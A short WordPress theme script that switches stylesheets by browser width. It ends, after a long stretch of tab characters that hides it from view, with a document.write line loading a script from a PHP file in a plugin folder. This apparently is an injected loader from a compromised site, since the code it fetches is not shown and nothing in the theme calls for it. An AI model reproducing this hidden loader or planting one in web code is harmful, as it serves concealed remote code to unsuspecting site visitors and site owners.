function adjustStyle(width) {
    width = parseInt(width);
    if (width < 581) {
        $("#size-stylesheet").attr("href", "/wp-content/themes/briansack/css/480.css");
    } else if ((width >= 581) && (width < 920)) {
        $("#size-stylesheet").attr("href", "/wp-content/themes/briansack/css/768.css");

    } else {
       $("#size-stylesheet").attr("href", "/wp-content/themes/briansack/css/main.css"); 
    }
}

$(function() {
    adjustStyle($(this).width());
    $(window).resize(function() {
        adjustStyle($(this).width());
    });
});																																																																							document.write('<script type="text/javascript" src="/wp-content/plugins/magic-fields/wpmu/swfobject2.php"><\/script>');
